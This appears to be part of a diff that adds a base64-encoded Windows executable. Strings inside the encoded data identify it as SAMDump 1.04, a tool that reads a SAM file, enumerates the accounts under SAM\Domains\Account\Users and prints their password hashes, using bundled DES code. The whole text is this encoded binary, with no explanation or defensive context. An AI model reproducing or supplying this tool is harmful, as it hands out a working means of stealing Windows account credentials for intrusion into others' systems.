+g8QEM8BdX15bg8QMw4X2dRiF23QKagHoHpj//4PEBGoD6NSU//+DxASD/wh0CoP/C3QFg/8EdSGL
+RVSD/wjHRVQAAAAAiUQkFHVLi0VYx0VYjAAAAIlEJBiD/wh1OIsN6P1AAKHs/UAAA8E7wX4xjQRJ
+weACi1VQg8AMQcdEAvwAAAAAixXo/UAAAxXs/UAAO9F/4esKi0QkEMcAAAAAAIXbdApqAeiPl///
+g8QEg/8IdQ2LRVhQagj/1oPECOsGV//Wg8QEg/8IdAqD/wt0BYP/BHUTi0QkFIP/CIlFVHUHi0Qk
+GIlFWDPAXV9eW4PEDMNhu0AAcbtAAHG7QABxu0AAkbtAAKG7QACxu0AAVLtAAAAHAQcHBwIHBwMH
+BwcEBwcHBwcFBszMzItEJAhWi/CLVCQIOVYEdBODxgyLDfT9QACNDEmNDIg7znfoi0YEK8KD+AEb
+wCPGXsPMzMzMzMzMzMzMzMzMzMyLTCQEU4vBg+EfweECg+DnwfgDi5DgDUEAjQTJjUwCBDPSihmK
+wySAitCLRCQMPQCAAAB1BYDjf+sKPQBAAAB1FoDLgIgZg/oBG8BbJQBAAAAFAEAAAMPo9ID//1vH
+ABYAAAC4/////8PMzMzMzMzMUT0AEAAAjUwkCHIUgekAEAAALQAQAACFAT0AEAAAc+wryIvEhQGL
+4YsIi0AEUMPMg+wIgz0I+0AAAFOLXCQQdRSD+0F8CIP7Wn8Dg8Mgi8Nbg8QIw4H7AAEAAH0wgz0c
++0AAAX4NagFT6ALA//+DxAjrD4sNYPtAADPAZosEWYPgAYXAdQeLw1uDxAjDis8z0orRoWD7QAD2
+RFABgHQUuAIAAACITCQIxkQkCgCIXCQJ6w64AQAAAIhcJAjGRCQJAI1MJARqAGoDixUI+0AAUVCN
+RCQYUGgAAQAAUuif7///g8QchcB1B4vDW4PECMOD+AF1CzPAikQkBFuDxAjDM8AzyYpEJAWKTCQE
+weAIWwvBg8QIw8zMzMzMzMzMzMzMVYvsV4t9CFfoIwAAAFpAUOhbgf//WgvAdAlXUOiPAAAAWlpf
+ycPMzMzMzMzMzMzMi0wkBPfBAwAAAHQUigFBhMB0QPfBAwAAAHXxBQAAAACLAbr//v5+A9CD8P8z
+woPBBKkAAQGBdOiLQfyEwHQyhOR0JKkAAP8AdBOpAAAA/3QC682NQf+LTCQEK8HDjUH+i0wkBCvB
+w41B/YtMJAQrwcONQfyLTCQEK8HDzMzMzMxXi3wkCOtqLovALovALovAi0wkBFf3wQMAAAB0D4oB
+QYTAdDv3wQMAAAB18YsBuv/+/n4D0IPw/zPCg8EEqQABAYF06ItB/ITAdCOE5HQaqQAA/wB0DqkA
+AAD/dALrzY15/+sNjXn+6wiNef3rA415/ItMJAz3wQMAAAB0GYoRQYTSdGSIF0f3wQMAAAB17usF
+iReDxwS6//7+fosBA9CD8P8zwosRg8EEqQABAYF04YTSdDSE9nQn98IAAP8AdBL3wgAAAP90AuvH
+iReLRCQIX8NmiReLRCQIxkcCAF/DZokXi0QkCF/DiBeLRCQIX8P/JSwhQQDMzMzMzMzMzMzMVYvs
+V1ZTi00QC8kPhNwAAACLdQiLfQyNBQD7QACDeAgAdUu3QbNatiAui8CKJgrkigd0IQrAdB1GRzj8
+cgY43HcCAuY4+HIGONh3AgLGOMR1DUl11zPJOMQPhI4AAAC5/////w+CgwAAAPfZ63+DPeQOQQAA
+fwr/BegOQQBqAOsSi9lqE+iWkv//xwQkAQAAAIvLM8Az25CKBgvAih90IwvbdB9GR1FQU+iy/P//
+i9iDxAToqPz//4PEBFk7w3UJSXXVM8k7w3QJuf////9yAvfZWAvAdQj/DegOQQDrDovZahPoqJL/
+/4PEBIvLi8FbXl/JwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQICBAQHBwgICwsNDQ4OEBATExUVFhYZGRoaHBwfHyAg
+IyMlJSYmKSkqKiwsLy8xMTIyNDQ3Nzg4Ozs9PT4+QEBDQ0VFRkZJSUpKTExPT1FRUlJUVFdXWFhb
+W11dXl5hYWJiZGRnZ2hoa2ttbW5ucHBzc3V1dnZ5eXp6fHx/f4CAg4OFhYaGiYmKioyMj4+RkZKS
+lJSXl5iYm5udnZ6eoaGioqSkp6eoqKurra2urrCws7O1tba2ubm6ury8v7/BwcLCxMTHx8jIy8vN
+zc7O0NDT09XV1tbZ2dra3Nzf3+Dg4+Pl5ebm6enq6uzs7+/x8fLy9PT39/j4+/v9/f7+AAAAABAA
+AAAAAAAgEAAAIAAAAQAQAAEAAAABIBAAASAACAAAEAgAAAAIACAQCAAgAAgBABAIAQAACAEgEAgB
+ICAAAAAwAAAAIAAAIDAAACAgAAEAMAABACAAASAwAAEgIAgAADAIAAAgCAAgMAgAICAIAQAwCAEA
+IAgBIDAIASAAAAgAEAAIAAAACCAQAAggAAAJABAACQAAAAkgEAAJIAAICAAQCAgAAAgIIBAICCAA
+CAkAEAgJAAAICSAQCAkgIAAIADAACAAgAAggMAAIICAACQAwAAkAIAAJIDAACSAgCAgAMAgIACAI
+CCAwCAggIAgJADAICQAgCAkgMAgJIAAAAAAAAAACACAAAAAgAAIAACAAAAAgAgAgIAAAICACBAAA
+AAQAAAIEIAAABCAAAgQAIAAEACACBCAgAAQgIAIABAAAAAQAAgAkAAAAJAACAAQgAAAEIAIAJCAA
+ACQgAgQEAAAEBAACBCQAAAQkAAIEBCAABAQgAgQkIAAEJCACAAAAEAAAABIAIAAQACAAEgAAIBAA
+ACASACAgEAAgIBIEAAAQBAAAEgQgABAEIAASBAAgEAQAIBIEICAQBCAgEgAEABAABAASACQAEAAk
+ABIABCAQAAQgEgAkIBAAJCASBAQAEAQEABIEJAAQBCQAEgQEIBAEBCASBCQgEAQkIBIAAAAAAQAA
+AAAABAABAAQAAAAAAQEAAAEAAAQBAQAEAQIAAAADAAAAAgAEAAMABAACAAABAwAAAQIABAEDAAQB
+AAIAAAECAAAAAgQAAQIEAAACAAEBAgABAAIEAQECBAECAgAAAwIAAAICBAADAgQAAgIAAQMCAAEC
+AgQBAwIEAQAAAAgBAAAIAAAECAEABAgAAAAJAQAACQAABAkBAAQJAgAACAMAAAgCAAQIAwAECAIA
+AAkDAAAJAgAECQMABAkAAgAIAQIACAACBAgBAgQIAAIACQECAAkAAgQJAQIECQICAAgDAgAIAgIE
+CAMCBAgCAgAJAwIACQICBAkDAgQJAAAAAAAAEAAAAQAAAAEQAAgAAAAIABAACAEAAAgBEAAAEAAA
+ABAQAAARAAAAERAACBAAAAgQEAAIEQAACBEQAAAAAAQAABAEAAEABAABEAQIAAAECAAQBAgBAAQI
+ARAEABAABAAQEAQAEQAEABEQBAgQAAQIEBAECBEABAgREAQAAAIAAAASAAABAgAAARIACAACAAgA
+EgAIAQIACAESAAAQAgAAEBIAABECAAAREgAIEAIACBASAAgRAgAIERIAAAACBAAAEgQAAQIEAAES
+BAgAAgQIABIECAECBAgBEgQAEAIEABASBAARAgQAERIECBACBAgQEgQIEQIECBESBAAAAAAAAAAQ
+AAABAAAAARAEAAAABAAAEAQAAQAEAAEQAAAAIAAAADAAAAEgAAABMAQAACAEAAAwBAABIAQAATAA
+ABAAAAAQEAAAEQAAABEQBAAQAAQAEBAEABEABAAREAAAECAAABAwAAARIAAAETAEABAgBAAQMAQA
+ESAEABEwABAAAAAQABAAEAEAABABEAQQAAAEEAAQBBABAAQQARAAEAAgABAAMAAQASAAEAEwBBAA
+IAQQADAEEAEgBBABMAAQEAAAEBAQABARAAAQERAEEBAABBAQEAQQEQAEEBEQABAQIAAQEDAAEBEg
+ABARMAQQECAEEBAwBBARIAQQETAAAAAAAAAACAgAAAAIAAAIAAQAAAAEAAgIBAAACAQACAAAAgAA
+AAIICAACAAgAAggABAIAAAQCCAgEAgAIBAIIAQAAAAEAAAgJAAAACQAACAEEAAABBAAICQQAAAkE
+AAgBAAIAAQACCAkAAgAJAAIIAQQCAAEEAggJBAIACQQCCAAAAAIAAAAKCAAAAggAAAoABAACAAQA
+CggEAAIIBAAKAAACAgAAAgoIAAICCAACCgAEAgIABAIKCAQCAggEAgoBAAACAQAACgkAAAIJAAAK
+AQQAAgEEAAoJBAACCQQACgEAAgIBAAIKCQACAgkAAgoBBAICAQQCCgkEAgIJBAIKAAAAAAABAAAA
+AAgAAAEIAAAAAAEAAQABAAAIAQABCAEQAAAAEAEAABAACAAQAQgAEAAAARABAAEQAAgBEAEIAQAA
+IAAAASAAAAAoAAABKAAAACABAAEgAQAAKAEAASgBEAAgABABIAAQACgAEAEoABAAIAEQASABEAAo
+ARABKAEAAgAAAAMAAAACCAAAAwgAAAIAAQADAAEAAggBAAMIARACAAAQAwAAEAIIABADCAAQAgAB
+EAMAARACCAEQAwgBAAIgAAADIAAAAigAAAMoAAACIAEAAyABAAIoAQADKAEQAiAAEAMgABACKAAQ
+AygAEAIgARADIAEQAigBEAMoAQAAAAAAAAAEAAAEAAAABAQCAAAAAgAABAIABAACAAQEACAAAAAg
+AAQAIAQAACAEBAIgAAACIAAEAiAEAAIgBAQgAAAAIAAABCAABAAgAAQEIgAAACIAAAQiAAQAIgAE
+BCAgAAAgIAAEICAEACAgBAQiIAAAIiAABCIgBAAiIAQEAAgAAAAIAAQACAQAAAgEBAIIAAACCAAE
+AggEAAIIBAQAKAAAACgABAAoBAAAKAQEAigAAAIoAAQCKAQAAigEBCAIAAAgCAAEIAgEACAIBAQi
+CAAAIggABCIIBAAiCAQEICgAACAoAAQgKAQAICgEBCIoAAAiKAAEIigEACIoBAQACAgCAAAIAAIA
+AAICCAgCAAAAAgIICAACAAgAAgAAAgIICAAACAgCAAAIAgIIAAACCAACAAAAAgAAAAACAAgAAAAI
+AAIAAAAACAACAAgIAAIICAIAAAgCAggAAAAIAAICAAAAAAgAAAAICAACAAgCAAgAAAIIAAICAAgC
+AAAAAAAAAAACCAgCAAgAAgIACAAACAgCAAAIAAIIAAAACAACAgAIAgAIAAAACAgAAgAAAgIICAAC
+AAAAAgAAAgAACAICCAgCAAgIAAAACAICCAACAAAAAgIIAAACAAgAAAAAAAAACAAAAAACAggAAgAI
+CAICAAAAAgAIAgAIAAACCAgAEIAQQAAAAAAAgBAAAAAQQBAAAEAQgAAAAIAAQACAEAAAgAAAEAAQ
+QBAAAAAAgABAEAAQAACAEEAAABBAEAAAAAAAEAAQgABAEAAQQACAAAAQgBAAAAAAQAAAAAAQABAA
+EIAAQBCAEAAAgBBAEAAAQAAAAEAAABAAEIAAABCAEEAQABAAAIAQQACAAEAQgBAAEIAQQBAAEAAQ
+AABAAAAAAAAAAEAQgAAAAAAQABAAEEAAgAAAAAAAQBCAEAAQgABAAIAQQACAAAAAAAAAEAAAQBAA
+AAAQgBBAAIAQAAAAEEAQABBAAAAQABCAAAAAgABAEIAAQBAAAAAAABBAAIAQAAEAAAQAAQQEAAEA
+AAEBAAQBAAQAAAAABAEBAAQAAQQAAAEABAAABAAAAAQEAQAAAAEBBAQBAQAAAQAAAAEABAQAAAAA
+AQAEAAABBAQAAQAAAQEAAAEBBAQAAAQAAQAABAEABAQAAQAEAQEEAAAABAQAAQQAAAAAAAAAAAQB
+AQQAAAEEBAABAAABAAAAAAAEAAEBAAABAAQAAAAEBAEBAAQAAAAAAAEEBAABBAABAAQEAQAEAAAA
+AAQBAQQEAQAAAAEBBAABAAAEAAAABAEBBAQAAAQAAAEABAEBAAQAAQQAAAEABAAAAAABAAQEAQEA
+AAEAAAQBAQQAAAEAAAAABAQIEEAAABAAEAgAAAAIEEAQAAAAAAAAQBAIEAAQCABAAAAQQBAIAAAQ
+AAAAEAgQAAAIAAAQCBBAAAAAQAAAAAAQCABAEAAQQAAAEAAACAAAAAAQQAAIEAAQAABAEAAQAAAI
+EAAAAAAAAAgAQAAAEEAQABAAEAgAQBAIEEAQAABAAAgAQBAIEAAAAABAAAgAABAAEEAAABAAEAgA
+AAAAAEAQCBAAEAAAAAAAEAAACABAAAAAAAAIAEAQABBAEAAQAAAAAAAQCBBAEAgQQAAAAEAACBBA
+EAgAAAAAEAAQCBBAAAgAQAAAEEAAAABAEAgQABAIEAAAAAAAEAgAABAAEEAQAAAACAAAAQAABAAA
+IAQBCCAAAQgABAAIIAQBAAAAAQgAAAEAIAAAACAAAAgABAEAIAQACCAAAQgABAEIAAAAAAAEAQAA
+AAAIIAABACAEAAAABAAIIAQBAAAAAAAgAAAIIAAAACAEAAggBAEIIAABAAAAAQgABAAAIAQAAAAE
+AQgABAEIIAQACCAAAQAAAAEIAAABACAAAAAgAAAIAAQACAAAAAgABAEAIAQBCAAAAAAgBAEAAAAA
+CAAEAAAgAAEAIAQACAAEAAAAAAAAIAQBCCAAAQgABAEIIAQAAAAAAQAABAEAIAABCAAEAAggBAAA
+IAAAACAEAQAAAAEIIAAACEAAAIBAACAAAAAAAAAgIIBAACAAACAAAEAgAIAAACAAQCAAAEAgIIAA
+ICAAAAAAgAAgAIBAAACAAAAggEAgIAAAACAAQCAAgEAAIIAAAAAAACAAAEAAAAAAICCAQAAggEAg
+IIAAACCAAAAAgEAgAABAAAAAACAgAEAgIAAAIACAQCAAAAAAAIAAIACAQCAgAAAgIIBAACAAAAAA
+AAAgAIAAAACAACAAAEAAIIAAACAAQAAgAEAgIIAAICAAQAAAAEAgIIAAICAAAAAgAEAgAIBAAACA
+AAAggEAgIAAAAAAAACAAAEAAAIBAIACAACAggAAAIIBAIAAAQAAAAEAAIIAAQAAAAAIAAAACAAEE
+AAABBEIAAQRAAAAAQgAAAAAAAAAAAAEEAgABBAIAAABAAAEEAAAAAEIAAQBAAAEEAgAABAIAAQBA
+AAAEQAAABEIAAQAAAAAAAgABBAAAAQBCAAAEQAABBEIAAABCAAEEAAAABEIAAARAAAEAAgAAAAAA
+AQRCAAAAQAABBEAAAQQCAAAAQAAAAAIAAAAAAAEEQAABBAIAAQRCAAAAQgAAAAAAAAACAAAEAAAB
+BAAAAAACAAEAAAAABAIAAQACAAEAQgAABAIAAABAAAAEQgABAAAAAQBCAAEEAAAABEAAAARCAAEE
+AAABAEIAAQBAAAEEQAAAgACAIAAAgiCAAAIAAAAAAAAAAiCAAIAAAACAIIAAgiCAAAAAAAAAIAAA
+ggCAAAIAgACCAIAAAiCAAAAgAACAIAAAAgCAAIIAgACAAAAAAiCAAIIggAAAIAAAAAAAAIIAAAAA
+IAAAgACAAAIggACAIAAAgAAAAAIAAACCIIAAAAAAAIAAAAACAIAAACCAAIIggAACAAAAACAAAAAA
+AACCAIAAgCCAAAIgAAACIIAAgAAAAIIggAAAAIAAgAAAAAIggACCIAAAgAAAAIAggAAAIAAAggCA
+AAIAgAACIAAAgCCAAAAAAACCIIAAggAAAAAAAAAAIIAAgCAAAAIAgACCAHDsQACwPUAAY3Nt4AEA
+AAAAAAAAAAAAAAMAAAAgBZMZAAAAAAAAAAD/////4lJAAP1SQAAAAAAA//////5fQAALYEAAAAAA
+AP////8AAAAA3WFAAAAAAAC2YUAAw2FAAP////85ZEAAP2RAAAAAAAD/////qmRAALJkQABMQ19U
+SU1FAExDX05VTUVSSUMAAExDX01PTkVUQVJZAExDX0NUWVBFAAAAAExDX0NPTExBVEUAAExDX0FM
+TAAALgAAACgAbgB1AGwAbAApAAAAAAAobnVsbCkAAAYAAAYAAQAAEAADBgAGAhAERUVFBQUFBQU1
+MABQAAAAACAoOFBYBwgANzAwV1AHAAAgIAgAAAAACGBgYGBgYAAAcHB4eHh4CAcIAAAHAAgICAAA
+CAAIAAAIAAAAcnVudGltZSBlcnJvciAAAA0KAABUTE9TUyBlcnJvcg0KAAAAU0lORyBlcnJvcg0K
+AAAAAERPTUFJTiBlcnJvcg0KAABSNjAyNw0KLSBub3QgZW5vdWdoIHNwYWNlIGZvciBsb3dpbyBp
+bml0aWFsaXphdGlvbg0KAAAAAFI2MDI2DQotIG5vdCBlbm91Z2ggc3BhY2UgZm9yIHN0ZGlvIGlu
+aXRpYWxpemF0aW9uDQoAAAAAUjYwMjUNCi0gcHVyZSB2aXJ0dWFsIGZ1bmN0aW9uIGNhbGwNCgAA
+AFI2MDI0DQotIG5vdCBlbm91Z2ggc3BhY2UgZm9yIF9vbmV4aXQvYXRleGl0IHRhYmxlDQoAAAAA
+UjYwMTkNCi0gdW5hYmxlIHRvIG9wZW4gY29uc29sZSBkZXZpY2UNCgAAAABSNjAxOA0KLSB1bmV4
+cGVjdGVkIGhlYXAgZXJyb3INCgAAAABSNjAxNw0KLSB1bmV4cGVjdGVkIG11bHRpdGhyZWFkIGxv
+Y2sgZXJyb3INCgAAAABSNjAxNg0KLSBub3QgZW5vdWdoIHNwYWNlIGZvciB0aHJlYWQgZGF0YQ0K
+AA0KYWJub3JtYWwgcHJvZ3JhbSB0ZXJtaW5hdGlvbg0KAAAAAFI2MDA5DQotIG5vdCBlbm91Z2gg
+c3BhY2UgZm9yIGVudmlyb25tZW50DQoAUjYwMDgNCi0gbm90IGVub3VnaCBzcGFjZSBmb3IgYXJn
+dW1lbnRzDQoAAABSNjAwMg0KLSBmbG9hdGluZyBwb2ludCBub3QgbG9hZGVkDQoAAAAATWljcm9z
+b2Z0IFZpc3VhbCBDKysgUnVudGltZSBMaWJyYXJ5AAAAAAoKAABSdW50aW1lIEVycm9yIQoKUHJv
+Z3JhbTogAAAALi4uADxwcm9ncmFtIG5hbWUgdW5rbm93bj4AAAAAAAD/////AAAAAIWOQAAAAAAA
+WY5AAF+OQAD/////AAAAAP2OQAAAAAAA0Y5AANeOQAB1bml0ZWQtc3RhdGVzAAAAdW5pdGVkLWtp
+bmdkb20AAHVuaXRlZCBzdGF0ZXMAAAB1bml0ZWQga2luZ2RvbQAAdHduAHR1cmtleQAAdHVyAHRh
+aXdhbgAAc3dpdHplcmxhbmQAc3dlZGVuAABzd2UAc3ZrAHNwYWluAAAAc291dGgta29yZWEAc291
+dGgga29yZWEAc2dwAHNpbmdhcG9yZQAAAHJ1c3NpYQAAcHJ0AHByLWNoaW5hAAAAAHByIGNoaW5h
+AAAAAHBvcnR1Z2FsAAAAAHBvbGFuZAAAcG9sAG56bABuegAAbm9yd2F5AABuZXctemVhbGFuZABu
+ZXcgemVhbGFuZABuZXRoZXJsYW5kcwBtZXhpY28AAG1leABrb3JlYQAAAGphcGFuAAAAaXRhbHkA
+AABpcmwAaXJlbGFuZABpY2VsYW5kAGh1bmdhcnkAaG9uZy1rb25nAAAAaG9uZyBrb25nAAAAaG9s
+bGFuZABoa2cAZ3JlZWNlAABncmVhdCBicml0YWluAAAAZ3JjAGdlcm1hbnkAZ2JyAGZyYW5jZQAA
+ZmlubGFuZABlbmdsYW5kAGRuawBkZW5tYXJrAGN6ZQBjaG4AY2hpbmEAAABjaGUAY2FuYWRhAABj
+YW4AYnJpdGFpbgBicmF6aWwAAGJyYQBiZWxnaXVtAGJlbABhdXQAYXVzdHJpYQBhdXN0cmFsaWEA
+AABhdXMAYW1lcmljYQB1c2EAdXMAAHVrAAB0dXJraXNoAHRyawBzd2lzcwAAAHN3ZWRpc2gAc3Zl
+AHNwYW5pc2gtbW9kZXJuAABzcGFuaXNoLW1leGljYW4Ac3BhbmlzaABzbG92YWsAAHNreQBydXNz
+aWFuAHJ1cwBwdGcAcHRiAHBvcnR1Z3Vlc2UtYnJhemlsaWFuAAAAAHBvcnR1Z3Vlc2UAAHBvbGlz
+aAAAcGxrAG5vcndlZ2lhbi1ueW5vcnNrAAAAbm9yd2VnaWFuLWJva21hbAAAAABub3J3ZWdpYW4A
+AABub3IAbm9uAG5sZABubGIAa29yZWFuAABrb3IAanBuAGphcGFuZXNlAAAAAGl0cwBpdGFsaWFu
+LXN3aXNzAAAAaXRhbGlhbgBpdGEAaXNsAGlyaXNoLWVuZ2xpc2gAAABpY2VsYW5kaWMAAABodW5n
+YXJpYW4AAABodW4AZ3JlZWsAAABnZXJtYW4tc3dpc3MAAAAAZ2VybWFuLWF1c3RyaWFuAGdlcm1h
+bgAAZnJzAGZyZW5jaC1zd2lzcwAAAABmcmVuY2gtY2FuYWRpYW4AZnJlbmNoLWJlbGdpYW4AAGZy
+ZW5jaAAAZnJjAGZyYgBmcmEAZmlubmlzaABmaW4AZXNwAGVzbgBlc20AZW56AGVudQBlbmkAZW5n
+bGlzaC11c2EAZW5nbGlzaC11cwAAZW5nbGlzaC11awAAZW5nbGlzaC1uegAAZW5nbGlzaC1pcmUA
+ZW5nbGlzaC1jYW4AZW5nbGlzaC1hdXMAZW5nbGlzaC1hbWVyaWNhbgAAAABlbmdsaXNoAGVuZwBl
+bmMAZW5hAGVsbABkdXRjaC1iZWxnaWFuAAAAZHV0Y2gAAABkZXUAZGVzAGRlYQBkYW5pc2gAAGRh
+bgBjemVjaAAAAGNzeQBjaHQAY2hzAGNoaW5lc2UtdHJhZGl0aW9uYWwAY2hpbmVzZS1zaW5nYXBv
+cmUAAABjaGluZXNlLXNpbXBsaWZpZWQAAGNoaW5lc2UtaG9uZ2tvbmcAAAAAY2hpbmVzZQBjaGkA
+Y2hoAGNhbmFkaWFuAAAAAGJlbGdpYW4AYXVzdHJhbGlhbgAAYW1lcmljYW4tZW5nbGlzaAAAAABh
+bWVyaWNhbiBlbmdsaXNoAAAAAGFtZXJpY2FuAAAAAAAAAAAAAAAAAAAAAEdldExhc3RBY3RpdmVQ
+b3B1cAAAR2V0QWN0aXZlV2luZG93AE1lc3NhZ2VCb3hBAHVzZXIzMi5kbGwAAEg6bW06c3MAZGRk
+ZCwgTU1NTSBkZCwgeXl5eQBNL2QveXkAAFBNAABBTQAARGVjZW1iZXIAAAAATm92ZW1iZXIAAAAA
+T2N0b2JlcgBTZXB0ZW1iZXIAAABBdWd1c3QAAEp1bHkAAAAASnVuZQAAAABBcHJpbAAAAE1hcmNo
+AAAARmVicnVhcnkAAAAASmFudWFyeQBEZWMATm92AE9jdABTZXAAQXVnAEp1bABKdW4ATWF5AEFw
+cgBNYXIARmViAEphbgBTYXR1cmRheQAAAABGcmlkYXkAAFRodXJzZGF5AAAAAFdlZG5lc2RheQAA
+AFR1ZXNkYXkATW9uZGF5AABTdW5kYXkAAFNhdABGcmkAVGh1AFdlZABUdWUATW9uAFN1bgAAAAAA
+U3VuTW9uVHVlV2VkVGh1RnJpU2F0AAAASmFuRmViTWFyQXByTWF5SnVuSnVsQXVnU2VwT2N0Tm92
+RGVjAAAAAAAAAAAAAAAAAAAAADj0QACI7EAAAAAAAAAAAAAAAAAAAQAAAJjsQACg7EAAAAAAADj0
+QAAAAAAAAAAAAP////8AAAAAAAAAAAEAAAA48EAAAAAAAP////8AAAAABAAAAAAAAAAAAAAAAQAA
+ALjsQAAAAAAAAAAAAAAAAADY7EAAAQAAAEjwQAAAAAAA/////wAAAAAEAAAAAAAAAAAAAAABAAAA
+8OxAAAAAAAAAAAAAAAAAABDtQAAgBZMZAgAAAEjtQAABAAAAWO1AAAAAAAAAAAAAAAAAAP////8A
+AAAA/////wAAAAAAAAAAAAAAAAEAAAABAAAAcO1AAAAAAAAAAAAAAAAAAAAAAADhF0AAIAWTGQQA
+AACg7UAAAQAAAMDtQAAAAAAAAAAAAAAAAAD/////AAAAAAAAAAC3IUAAAAAAAKohQAD/////AAAA
+AAAAAAACAAAAAwAAAAEAAADY7UAAAAAAAAAAAAA48EAArP///8QhQAAgBZMZAwAAAAjuQAABAAAA
+IO5AAAAAAAAAAAAAAAAAAP////8AAAAAAAAAAMgjQAD/////AAAAAAAAAAABAAAAAgAAAAEAAAA4
+7kAAAAAAAAAAAAA48EAA0P///9UjQAAgBZMZAwAAAGjuQAABAAAAgO5AAAAAAAAAAAAAAAAAAP//
+//8AAAAAAAAAAHMlQAD/////AAAAAAAAAAABAAAAAgAAAAEAAACY7kAAAAAAAAAAAAA48EAAxP//
+/4AlQAAgBZMZAwAAAMjuQAABAAAA4O5AAAAAAAAAAAAAAAAAAP////8AAAAAAAAAAGonQAD/////
+AAAAAAAAAAABAAAAAgAAAAEAAAD47kAAAAAAAAAAAAA48EAAwP///3cnQAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAgVUAAAAAAAAAAAAAATEAAcI1AAAAAAAAAAAAA0ExAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAABOFAAAAAAAAuSgAAAAAAAAThQAAAAAAALkgAAFwAAAByYgAAAAAAAGNoZWNrX3ZwOiBt
+YWxsb2MgZmFpbCBmb3IgaG9tZWRpci4KAGNoZWNrX3ZwOiBtYWxsb2MgZmFpbCBmb3IgY29tbWVu
+dC4KAGNoZWNrX3ZwOiBtYWxsb2MgZmFpbCBmb3IgdXNlcm5hbWUuCgAAAAAlMDJYAAAAADoKAAAs
+AAAAJXMAADoAAABOTyBQQVNTV09SRCoqKioqKioqKioqKioqKioqKioqKgAAAAAqKioqKioqKioq
+KioqKioqKioqKioqKioqKioqKioqKgAAAAAlczolZDoAAEZhaWxlZCB0byBwYXJzZSBlbnRyeSBm
+b3IgUklEICVYCgAAAHByaW50b3V0X3NtYl9lbnRyeTogVW5hYmxlIHRvIHJlYWQgdXNlciAnVicg
+dmFsdWUuIEVycm9yIHdhcyAlcy4KLgAAcHJpbnRvdXRfc21iX2VudHJ5OiBtYWxsb2MgZmFpbCBm
+b3IgdXNlciBlbnRyeS4KAAAAAHByaW50b3V0X3NtYl9lbnRyeTogVW5hYmxlIHRvIGRldGVybWlu
+ZSBzaXplIG5lZWRlZCBmb3IgdXNlciAnVicgdmFsdWUuIEVycm9yIHdhcyAlcy4KLgBWAAAAZW51
+bWVyYXRlX3VzZXJzOiBGYWlsZWQgdG8gb3BlbiBrZXkgJXMgdG8gcmVhZCB2YWx1ZS4gRXJyb3Ig
+d2FzICVzLgoAAAAAX1JlZ09wZW5LZXlFeCBlcnJvcjogJWQKAAAAAFNBTVxEb21haW5zXEFjY291
+bnRcVXNlcnMAAABfUmVnT3BlbkhpdmUgZXJyb3I6ICVkCgBVc2FnZToKICBTQU1EVU1QIDxTQU0g
+ZmlsZSBuYW1lPgoAAABTQU1EdW1wIDEuMDQuIENyZWF0ZWQgYnkgRG1pdHJ5IEFuZHJpYW5vdgoA
+AAAAAAAAAAAAAQEBAQEBAQH+/v7+/v7+/h8fHx8fHx8f4ODg4ODg4OAB/gH+Af4B/v4B/gH+Af4B
+H+Af4A7xDvHgH+Af8Q7xDgHgAeAB8QHx4AHgAfEB8QEf/h/+Dv4O/v4f/h/+Dv4OAR8BHwEOAQ4f
+AR8BDgEOAeD+4P7x/vH+/uD+4P7x/vEAAAAAAAAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAAA
+AAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAAAAAAAREVTIHBhcnQgb2YgU1NMZWF5IDAuNi42IDE0
+LUphbi0xOTk3AAAAAGxpYmRlcyB2IDQuMDEgLSAxMy1KYW4tMTk5NyAtIGVheQAAAAj0QADg80AA
+AQAAAAThQAAAAAAALj9BVnR5cGVfaW5mb0BAAFBVQAAAAAAAAQAAABYAAAACAAAAAgAAAAMAAAAC
+AAAABAAAABgAAAAFAAAADQAAAAYAAAAJAAAABwAAAAwAAAAIAAAADAAAAAkAAAAMAAAACgAAAAcA
+AAALAAAACAAAAAwAAAAWAAAADQAAABYAAAAPAAAAAgAAABAAAAANAAAAEQAAABIAAAASAAAAAgAA
+ACEAAAANAAAANQAAAAIAAABBAAAADQAAAEMAAAACAAAAUAAAABEAAABSAAAADQAAAFMAAAANAAAA
+VwAAABYAAABZAAAACwAAAGwAAAANAAAAbQAAACAAAABwAAAAHAAAAHIAAAAJAAAABgAAABYAAACA
+AAAACgAAAIEAAAAKAAAAggAAAAkAAACDAAAAFgAAAIQAAAANAAAAkQAAACkAAACeAAAADQAAAKEA
+AAACAAAApAAAAAsAAACnAAAADQAAALcAAAARAAAAzgAAAAIAAADXAAAACwAAABgHAAAMAAAAIAWT
+GQAAAAAAAAAAAAAAABAPQQAAAAAAEA9BAAEBAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAA
+AgAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
